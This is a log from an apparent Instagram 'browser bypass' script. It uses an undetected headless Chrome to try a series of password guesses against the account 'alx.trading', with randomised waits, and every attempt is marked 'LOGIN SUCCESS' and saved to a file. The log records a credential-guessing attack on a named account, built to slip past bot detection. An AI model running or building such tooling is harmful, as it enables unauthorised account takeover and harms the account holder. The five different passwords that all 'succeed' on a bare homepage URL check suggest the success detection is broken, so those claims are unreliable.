2025-05-25 17:01:51,300 - INFO - 🚀 Starting Comprehensive Browser Bypass
2025-05-25 17:01:51,301 - INFO - 🎯 Target: alx.trading
2025-05-25 17:01:51,301 - INFO - ============================================================
2025-05-25 17:01:51,301 - INFO - 🔧 Setting up stealth browser...
2025-05-25 17:01:51,487 - INFO - patching driver executable /home/codespace/.local/share/undetected_chromedriver/undetected_chromedriver
2025-05-25 17:01:51,762 - INFO - setting properties for headless
2025-05-25 17:01:51,762 - INFO - ✅ Undetected Chrome setup successful
2025-05-25 17:01:51,848 - INFO - ✅ Browser setup complete
2025-05-25 17:01:51,848 - INFO - 
🎯 BROWSER BYPASS ATTEMPT 1/6
2025-05-25 17:01:51,848 - INFO - Password: Fleming654
2025-05-25 17:01:51,848 - INFO - ----------------------------------------
2025-05-25 17:01:51,848 - INFO - 🌐 Navigating to Instagram...
2025-05-25 17:01:57,547 - INFO - ✅ Instagram loaded successfully
2025-05-25 17:01:57,547 - INFO - 🔐 Attempting login: alx.trading / Fleming654
2025-05-25 17:02:01,373 - INFO - 📝 Filling username...
2025-05-25 17:02:04,505 - INFO - 🔑 Filling password...
2025-05-25 17:02:07,759 - INFO - 🚀 Clicking login button...
2025-05-25 17:02:11,581 - INFO - 🔍 Checking login result...
2025-05-25 17:02:14,708 - INFO - 📍 Current URL: https://www.instagram.com/
2025-05-25 17:02:14,709 - INFO - 🎉 LOGIN SUCCESS!
2025-05-25 17:02:14,709 - INFO - 📊 Login result: {'status': 'success', 'url': 'https://www.instagram.com/'}
2025-05-25 17:02:14,709 - INFO - 🎉 DIRECT LOGIN SUCCESS!
2025-05-25 17:02:14,718 - INFO - 💾 Success data saved to: BROWSER_BYPASS_SUCCESS_Fleming654_20250525_170214.json
2025-05-25 17:02:14,718 - INFO - ⏱️ Waiting 17.2 seconds...
2025-05-25 17:02:36,751 - INFO - 
🎯 BROWSER BYPASS ATTEMPT 2/6
2025-05-25 17:02:36,751 - INFO - Password: Fleming786
2025-05-25 17:02:36,751 - INFO - ----------------------------------------
2025-05-25 17:02:36,751 - INFO - 🌐 Navigating to Instagram...
2025-05-25 17:02:40,683 - INFO - ✅ Instagram loaded successfully
2025-05-25 17:02:40,683 - INFO - 🔐 Attempting login: alx.trading / Fleming786
2025-05-25 17:02:43,116 - INFO - 📝 Filling username...
2025-05-25 17:02:45,815 - INFO - 🔑 Filling password...
2025-05-25 17:02:48,990 - INFO - 🚀 Clicking login button...
2025-05-25 17:02:52,852 - INFO - 🔍 Checking login result...
2025-05-25 17:02:57,748 - INFO - 📍 Current URL: https://www.instagram.com/
2025-05-25 17:02:57,748 - INFO - 🎉 LOGIN SUCCESS!
2025-05-25 17:02:57,748 - INFO - 📊 Login result: {'status': 'success', 'url': 'https://www.instagram.com/'}
2025-05-25 17:02:57,748 - INFO - 🎉 DIRECT LOGIN SUCCESS!
2025-05-25 17:02:57,757 - INFO - 💾 Success data saved to: BROWSER_BYPASS_SUCCESS_Fleming786_20250525_170257.json
2025-05-25 17:02:57,757 - INFO - ⏱️ Waiting 10.3 seconds...
2025-05-25 17:03:11,753 - INFO - 
🎯 BROWSER BYPASS ATTEMPT 3/6
2025-05-25 17:03:11,753 - INFO - Password: Fleming1004
2025-05-25 17:03:11,753 - INFO - ----------------------------------------
2025-05-25 17:03:11,753 - INFO - 🌐 Navigating to Instagram...
2025-05-25 17:03:16,948 - INFO - ✅ Instagram loaded successfully
2025-05-25 17:03:16,948 - INFO - 🔐 Attempting login: alx.trading / Fleming1004
2025-05-25 17:03:20,434 - INFO - 📝 Filling username...
2025-05-25 17:03:23,303 - INFO - 🔑 Filling password...
2025-05-25 17:03:25,563 - INFO - 🚀 Clicking login button...
2025-05-25 17:03:28,734 - INFO - 🔍 Checking login result...
2025-05-25 17:03:32,232 - INFO - 📍 Current URL: https://www.instagram.com/
2025-05-25 17:03:32,232 - INFO - 🎉 LOGIN SUCCESS!
2025-05-25 17:03:32,232 - INFO - 📊 Login result: {'status': 'success', 'url': 'https://www.instagram.com/'}
2025-05-25 17:03:32,232 - INFO - 🎉 DIRECT LOGIN SUCCESS!
2025-05-25 17:03:32,240 - INFO - 💾 Success data saved to: BROWSER_BYPASS_SUCCESS_Fleming1004_20250525_170332.json
2025-05-25 17:03:32,240 - INFO - ⏱️ Waiting 14.7 seconds...
2025-05-25 17:03:51,800 - INFO - 
🎯 BROWSER BYPASS ATTEMPT 4/6
2025-05-25 17:03:51,800 - INFO - Password: Fleming1060
2025-05-25 17:03:51,800 - INFO - ----------------------------------------
2025-05-25 17:03:51,800 - INFO - 🌐 Navigating to Instagram...
2025-05-25 17:03:55,878 - INFO - ✅ Instagram loaded successfully
2025-05-25 17:03:55,878 - INFO - 🔐 Attempting login: alx.trading / Fleming1060
2025-05-25 17:03:59,547 - INFO - 📝 Filling username...
2025-05-25 17:04:03,272 - INFO - 🔑 Filling password...
2025-05-25 17:04:06,070 - INFO - 🚀 Clicking login button...
2025-05-25 17:04:09,582 - INFO - 🔍 Checking login result...
2025-05-25 17:04:12,848 - INFO - 📍 Current URL: https://www.instagram.com/
2025-05-25 17:04:12,848 - INFO - 🎉 LOGIN SUCCESS!
2025-05-25 17:04:12,848 - INFO - 📊 Login result: {'status': 'success', 'url': 'https://www.instagram.com/'}
2025-05-25 17:04:12,848 - INFO - 🎉 DIRECT LOGIN SUCCESS!
2025-05-25 17:04:12,856 - INFO - 💾 Success data saved to: BROWSER_BYPASS_SUCCESS_Fleming1060_20250525_170412.json
2025-05-25 17:04:12,857 - INFO - ⏱️ Waiting 18.6 seconds...
2025-05-25 17:04:36,356 - INFO - 
🎯 BROWSER BYPASS ATTEMPT 5/6
2025-05-25 17:04:36,357 - INFO - Password: Fleming1182
2025-05-25 17:04:36,357 - INFO - ----------------------------------------
2025-05-25 17:04:36,357 - INFO - 🌐 Navigating to Instagram...
2025-05-25 17:04:40,880 - INFO - ✅ Instagram loaded successfully
2025-05-25 17:04:40,880 - INFO - 🔐 Attempting login: alx.trading / Fleming1182
2025-05-25 17:04:43,174 - INFO - 📝 Filling username...
2025-05-25 17:04:46,828 - INFO - 🔑 Filling password...
2025-05-25 17:04:49,393 - INFO - 🚀 Clicking login button...
2025-05-25 17:04:54,236 - INFO - 🔍 Checking login result...
2025-05-25 17:04:58,193 - INFO - 📍 Current URL: https://www.instagram.com/
2025-05-25 17:04:58,194 - INFO - 🎉 LOGIN SUCCESS!
2025-05-25 17:04:58,194 - INFO - 📊 Login result: {'status': 'success', 'url': 'https://www.instagram.com/'}
2025-05-25 17:04:58,194 - INFO - 🎉 DIRECT LOGIN SUCCESS!
2025-05-25 17:04:58,203 - INFO - 💾 Success data saved to: BROWSER_BYPASS_SUCCESS_Fleming1182_20250525_170458.json
2025-05-25 17:04:58,203 - INFO - ⏱️ Waiting 11.2 seconds...
2025-05-25 17:05:00,216 - INFO - 🔄 Closing browser...
Traceback (most recent call last):
  File "/workspaces/sugarglitch-realops/extracted_project/Python/instagram_browser_bypass.py", line 620, in <module>
    results = bypass_system.run_comprehensive_browser_bypass()
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/workspaces/sugarglitch-realops/extracted_project/Python/instagram_browser_bypass.py", line 587, in run_comprehensive_browser_bypass
    time.sleep(wait_time)
KeyboardInterrupt
2025-05-25 17:05:00,378 - INFO - ensuring close
